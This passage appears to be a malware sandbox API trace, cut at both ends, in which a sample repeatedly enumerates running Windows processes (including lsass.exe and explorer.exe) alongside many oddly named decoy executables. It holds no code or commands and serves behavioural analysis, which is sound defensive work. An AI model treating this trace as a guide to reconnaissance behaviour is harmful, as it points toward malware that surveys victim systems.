dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0106.687] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.688] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0106.689] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0106.689] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.690] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.691] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.691] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.692] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.693] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0106.693] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.694] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.695] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.696] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.697] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.699] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.700] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.702] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.703] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.705] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.706] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0106.708] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0106.709] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0106.710] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0106.712] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0106.741] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0106.742] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0106.743] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0106.744] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0106.745] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0106.746] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0106.747] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0106.748] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0106.749] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0106.750] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0106.751] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0106.752] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0106.753] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0106.754] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0106.755] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.756] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.768] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0106.769] CloseHandle (hObject=0xc4) returned 1 [0106.769] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0106.774] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.775] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0106.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.777] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0106.779] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0106.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0106.781] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.783] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.784] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.785] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0106.785] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.791] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.792] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.793] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.794] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.796] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.797] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.798] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.799] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.801] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.809] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0106.810] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0106.812] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0106.813] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0106.814] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0106.815] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0106.816] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0106.818] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0106.819] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0106.820] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0106.821] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0106.822] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0106.823] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0106.825] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0106.826] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0106.827] 